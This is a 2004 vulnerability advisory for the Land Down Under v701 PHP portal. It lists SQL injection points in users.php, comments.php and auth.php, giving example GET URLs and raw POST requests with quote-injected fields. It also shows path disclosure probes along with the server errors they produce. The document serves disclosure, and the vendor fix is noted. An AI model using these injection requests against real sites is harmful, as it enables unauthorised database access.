Multiple SQL-injections in Land Down Under v701
Date: 30.10.04
Application: Land Down Under v701
Platform: PHP
Severity: Medium
Link: http://www.neocrome.net
Vendor Status
Vulnerabilities have been fixed.


Details

An input validation vulnerability was reported in Land Down Under v701. A remote user can conduct SQL injection attack.


1. SQL-injections in GET
/users.php?f=1&s=1'[sql code here]&w=asc&d=50
/users.php?f=1&s=name&w=1'[sql code here]&d=50
/users.php?f=1&s=name&w=asc&d=1'[sql code here]
/users.php?f=1&s=1'[sql code here]&w=asc
/users.php?f=1&s=name&w=1'[sql code here]
/comments.php?id=1"[sql code here]



2. SQL-injections in POST
POST /auth.php?m=register&a=add HTTP/1.1
Host: www.neocrome.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 123
rusername="[sql code here]&remail=scanner@ptsecurity.com&rpassword1=1&rpassword2=1&rlocation=1&roccupation=1&ruserwebsite=1&x=1&rcountry=1
POST /auth.php?m=register&a=add HTTP/1.1
Host: www.neocrome.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 102
rusername=1&remail="[sql code here]&rpassword1=1&rpassword2=1&rlocation=1&roccupation=1&ruserwebsite=1&x=1&rcountry=1



3. Path disclosures:
/plug.php?h=1'
Result:
<...>
<br />
<b>Warning</b>: fopen(system/help/1.txt): failed to open stream: No such file or directory in <b>/home/neocrome/public_html/system/core/plug.inc.php</b> on line <b>266</b><br/>
Couldn't find a file : system/help/1.txt
<...>

POST /auth.php?m=login&a=check HTTP/1.1
Host: www.neocrome.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 52
PHPSESSID="&rusername=1&rpassword=1&x=1&rcookiettl=1



Result:
<...>
ion_start(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in <b>/home/neocrome/public_html/system/common.php</b> on line <b>169</b><br />
<...>



Impact
A remote user can execute SQL commands on the underlying database.
Solution
Check for update: http://www.neocrome.net/index.php?msingle&id91.